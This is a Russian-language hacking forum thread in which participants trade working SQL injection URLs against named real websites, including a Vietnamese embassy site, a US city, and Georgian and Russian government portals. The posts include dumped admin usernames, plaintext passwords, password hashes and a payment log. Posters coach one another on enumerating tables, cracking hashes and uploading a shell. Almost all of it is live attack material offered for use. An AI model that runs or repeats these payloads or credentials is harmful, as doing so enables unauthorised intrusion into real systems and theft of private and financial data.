Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user() ,0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету(конечно к information_schema доступа не будет.. этож 4 версия.. там его просто нет=)
Calcutta
27.08.2008, 07:41
http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+informatio n_schema.tables+limit+0,1--
Строительная компания какая-то -)
только в табличках нифига толкового нету.
:)
Турфирма Эл ь ф-СПб
http://www.bustur.ru
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user (),0x3a,database())--
version() - 5.1.19-beta
user() - petrotour@localhost
database() - petrotour
Есть контакт! Пошли таблички:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_s chema.tables--
----------------------------------------------------------------
http://santechmart.ru
http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3 a,database())--
version() - 5.0.41-log
user() - santechmartru@troy.mplik.ru
database() - santechmartru
Табличке:
http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema. tables+limit+1,1--
Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д. :)
http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from %20+users+limit+0,10/*
админка http://www.pc-olymp.ru/admin/
пароль и пасс
admin;admin
Посольство Вьетнамское в Штатах.
http://viet.vietnamembassy.us/tintuc/index.php?category=93
Dbname: vnemb_news2004
Version:4.1.20-log
User:vnemb_3_r@209.68.2.136
Америкосовские сайтеги... ы)
http://www.fairelections.us
http://www.fairelections.us/article.php?id=-104+union+select+1,2,unhex(hex(version())),4,5--
version() - 5.0.45-community-log
user() - ourcoupl_fairele@localhost
database() - ourcoupl_fairelections
От вывода инфы я офигел. Еле-еле-еле нашел. В общем снизу слева есть ссылочка: "Printer Safe Version", смотрим ее и видим интересующую нас инфу.
Таблички перебираем лимитом limit+2,1 ; 3,1 и т.д.
http://www.fairelections.us/article.php?id=-104+union+select+1,2,table_name,4,5+from+informati on_schema.tables+limit+2,1--
Ну что? Давайте пойдем покрупнее.
The City of Bremerton, WA
http://www.ci.bremerton.wa.us
На этом сайте я вообще вывода почти не нашел если бы НЕ циферка в коде, попавшаяся мне на глаза :)
http://www.ci.bremerton.wa.us/display.php?id=1039+union+select+1,2,unhex(hex(ver sion())),4,5,6,7,8,9,10,11,12,13,14/*
version() - 4.1.12-log
user() - bremcity@localhost
database() - bremcity
Гуд выводы пошли, хорошо шифруются :)
http://www.host-sweet.com/profile/host.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a, version(),database(),user()),3,4,5,6,7/*
3 4.0.26-standard:ho8802_sweet:ho8802_hideki@localhost
http://www.demonews.de/artikel/index.php?artikel=1+UNION+SELECT+concat_ws(0x3a,ve rsion(),database(),user())/*
Special: 4.1.22-max-log:d001e7e3:d001e7e3@85.13.137.29
http://progmusic.ru/space/discography.php?id=-5+union+select+1,2,(concat_ws(0x3d,user_pass,user_ fname,user_mail)),4,5,6,7,8+from+admin_users+limit +0,1--
Пасс=логин=мыло
вот только я с с паролями разобратся не смог, это же ведь не MD5, и как и брутить? :confused:
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
Так?
0nep@t0p
27.08.2008, 20:36
2 SeNaP
А хэши по-твоему только md5 в природе существуют ? По длине хэша, это скорее всего mysql хэш, брутить Passwords Pro
www.hashcracking.info рулит
43e9a4ab75570f5b : admin
2 geforse
Пипл, вы пистец, вы статьи читайте. С чего ты решил что полей 8 ? Unknown column '8' in 'order clause'
И для вопросов существует отдельная тема. Джифорс, читай статьи.
Эмм, сначала я прогнал, решив, что полей два. Пасиба .Begemot.'y, который меня поправил ^^
Не выводит на полях http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()
Что делать?
geforce Личная просьба.Поищи другой сайт для экспериментов. Это сайт Осетии.
Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()???
Cennarios
27.08.2008, 21:57
http://www.maxivetlanda.se/view_2008.php?katid=-1+union+select+concat(0x3a3a,loginnamn,0x3a3a,lose nord,0x3a3a)+from+anv+limit+0,1/*
login: super password: duper
http://www.maxivetlanda.se/admin
.Begemot.
27.08.2008, 22:27
Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*
version()???
http://15rus.ru/txt.php?cat=-3+union+select+0,VERSION(),2,3,4,5,6,7,8/*
http://15rus.ru/txt.php?cat=-3+union+select+0,schema_name,2,3,4,5,6,7,8+from+in formation_schema.schemata+limit+1,1/*
Выводит u19256 Это что?
Имха... тебе таблы нужны =\
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/*
(Зацени какой красивый вывод ;) )
Я бы на твоём месте заинтересовался этой:
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,char(58),user_pas sword),3,4,5,6,7,8,9+from+phpbb_users/*
Залить шеллтеперь дело техники... кибби круто описал всё... дерзай ;)
Имха... тебе таблы нужны =\
(Зацени какой красивый вывод ;) )
Я бы на твоём месте заинтересовался этой:
Залить шеллтеперь дело техники... кибби круто описал всё... дерзай ;)
Нашёл админа имя и пороль:
Mihael:3fde6bb0541387e4ebdadf7c2ff31123
пороль: 1q2w3e
Не заходит почему?
http://15rus.ru//forum/index.php
0nep@t0p
28.08.2008, 02:05
Эмм, там таблиц с юзерами пхпбб форума аж 3 -
http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name=0x757365 726E616D65/*
Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка -
phpBB : Critical Error
Error obtaining user details
DEBUG MODE
SELECT * FROM phpbb2_users WHERE user_id = -1
=/
Правильный запрос выглядит так -
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+us er_level=1/*
Это 4 админа форума, теперь расшифровывай хэши
грузинский сайтег The So cial Subsi dy Agency
http://www.ssa.gov.ge
http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() - 4.0.27
user() - ssa_gov_ge@localhost
database() - ssa_gov_ge
Пробовал получить доступ к mysql.user , но его нету.
А подскажите плиз как увидеть поле...
....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
вот так
....pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,<имя столбца который хочешь посмотреть>)+from+<имя таблицы, где эта колонка>+limit+0,1--
видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу
У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей.
С помощью этого запроса я вижу таблицу и колонку user_list::pass
...pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
я же вроде написал как...
...pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,login,pass)+from+u ser_list+limit+0,1--только пробел удали в user_list
Кароче вот запрос на таблицу с полем пасс
https://billing.adenazone.ru/pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+232,1--
в общем то вот лог платежей их.. https://billing.adenazone.ru/pricelist.php?step=2&server=-15+union+select+1,2,3,null,concat_ws(0x3a3a,billin g_id,payment_amount,payment_wmr,payer_wmid,payer_p urse),null,null,null+from+wm_payment_log--весьма не мало платежей... дальше ковырять впадлу, пойду спать..
БД
(перебирать limit+0т 0,1 до 37,1
http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,table_name,6+from+INFORMAT ION_SCHEMA.tables+limit+0,1--
Верися: 5.0.67-log
http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,version(),6--
БД system
http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,column_name,6+from+INFORMA TION_SCHEMA.columns+where+table_name=0x73797374656 d--
0x73797374656d = system так как идет фильтрация =)
:)
avo.ru - Администрация Владимирской области
Взлом через сайт admgor.avo.ruhttp://admgor.avo.ru/mun_zak/mun_zak.php?type=2&state_id=-1+union+select+concat_ws(0x3a,username,email,passw ord,usertype),2,3,4,5+from+aleksandrov.jos_users+l imit+0,1/*login : admin
password : zxcvbnm098
статус : Super Administrator
Полазил по админке http://avo.ru/administrator/ - и халяву сразу прикрыли :(
S0ulVortex
28.08.2008, 15:43
http://www.avi-trucks.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*
1) _http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),DATABASE()),6,7,8,9,10,11,12/*
2) _http://www.wemarketu.com/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),version( ),DATABASE()),4/*
Юзер:Версия БД: БД :)
ЮЗЕР ВЕРСИЯ-БД БАЗА ДАННЫХ
http://djexx.com/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(), DATABASE()),3,4,5,6,7,8,9,10--
БАЗЫ данных ( перебирать limit'ом от 0,1 до 28,1)
http://djexx.com/news.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from +information_schema.tables+limit+1,1--
там не чего интересного нет :( кто найдет что побольше, выкладывайте :)
ЮЗЕР ВЕРСИЯ БАЗА ДАННЫХ
http://www.etc-nepal.org/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6/*
http://teamhardcorepavement.com/news.php?id=-12+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4,5,6,7/*
Cennarios
28.08.2008, 17:11
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1/*
login:brianficek
pass:85688717ef4fab9 mb md5 64 bit?
Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+inform ation_schema.tables/*
БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x6a6f735f7 573657273/*
немогу данный просматреть :(
БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25f7573657273/*
И опять же не могу просмотреть :(
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_us ers+limit+1,1--
Скажите в чем проблема?
Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+inform ation_schema.tables/*
БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x6a6f735f7 573657273/*
немогу данный просматреть :(
БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25f7573657273/*
И опять же не могу просмотреть :(
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_us ers+limit+1,1--
Скажите в чем проблема?
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a. phpbb_users/*
нужно указывать и название базы
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot